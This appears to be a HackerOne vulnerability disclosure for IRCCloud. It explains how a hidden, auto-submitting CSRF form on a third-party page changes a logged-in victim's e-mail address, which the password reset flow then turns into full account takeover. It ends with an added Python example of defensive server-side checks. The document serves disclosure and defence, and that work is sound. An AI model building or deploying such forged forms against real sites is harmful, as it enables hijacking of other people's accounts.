IRCCloud: Full account takeover using CSRF and password reset

ID H1:6910
Type hackerone
Reporter melvin
Modified 2014-04-14T13:43:11


An attacker could take over any user account with the following steps.

1) Exploit a CSRF vulnerability in /chat/user-settings. An attacker creates a webpage on a (non-IRCCloud) website (for example: and inserts a (hidden) form like this:

<form action="" method="post">
<input type="hidden" name="email" value="">
<input type="hidden" name="realname" value="Doesn't Matter">
<input type="hidden" name="hwords" value="">
<input type="hidden" name="autoaway" value="1">
<input type="hidden" name="reqid" value="1">
<input type="hidden" name="session" value="">
<input type="submit">
<!-- some code to make the form submit automatically, in the background -->
</form>

2) The attacker sends the victim a link to that page. When the victim, while logged in to IRCCloud, clicks the link, the victim's e-mail address on IRCCloud is updated (in the background) to

3) The attacker receives an e-mail asking to confirm the new e-mail address (see: mail.png).

4) The attacker can now use the password reset functionality to change the password of the victim's account and gain full control over it.
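As an added illustration of the server-side checks that break this chain (example code written for this page, not IRCCloud's own code), the following Python function validates a POST to /chat/user-settings: it rejects requests whose Origin/Referer is not the site's own, requires a CSRF token bound to the cookie session, and requires the current password before the e-mail address may change. The site origin, secret key, salt and the csrf_token/password field names are assumptions.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed values for the demo: the app's own origin and a server-side secret.
SITE_ORIGIN = "https://www.irccloud.com"
SECRET_KEY = b"constructed-server-secret-do-not-reuse"


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token derived from the session id: a third-party page cannot
    compute it, and a token issued to one session is useless for another."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def password_hash(password: str, salt: bytes) -> bytes:
    """PBKDF2 stand-in for whatever the real user store uses."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def check_user_settings_post(headers: dict, form: dict, session_id: str,
                             stored_hash: bytes, salt: bytes) -> tuple[bool, str]:
    """Decide whether a POST to /chat/user-settings may be applied.
    Returns (accepted, reason); each rejection blocks one link of the chain above."""
    # 1. A form hosted on a non-IRCCloud page carries that page's Origin (or
    #    Referer); anything but our own host is rejected outright.
    source = headers.get("Origin") or headers.get("Referer")
    if not source or urlparse(source).netloc != urlparse(SITE_ORIGIN).netloc:
        return False, "cross-origin request"
    # 2. The hidden csrf_token field must match the token bound to the cookie
    #    session. The forged form cannot carry it, so it fails here.
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token_for(session_id)):
        return False, "missing or invalid CSRF token"
    # 3. The e-mail address feeds the password reset flow, so changing it
    #    requires the current password, which a CSRF page does not know.
    if "email" in form:
        supplied = password_hash(form.get("password", ""), salt)
        if not hmac.compare_digest(supplied, stored_hash):
            return False, "email change requires current password"
    return True, "ok"


def email_change_notices(old_email: str, new_email: str) -> dict:
    """Confirmation goes to the new address, but a notice (with an undo link)
    also goes to the old one, so the real owner sees the change from step 3."""
    return {new_email: "confirm your new address",
            old_email: "your address was changed; undo if this was not you"}
```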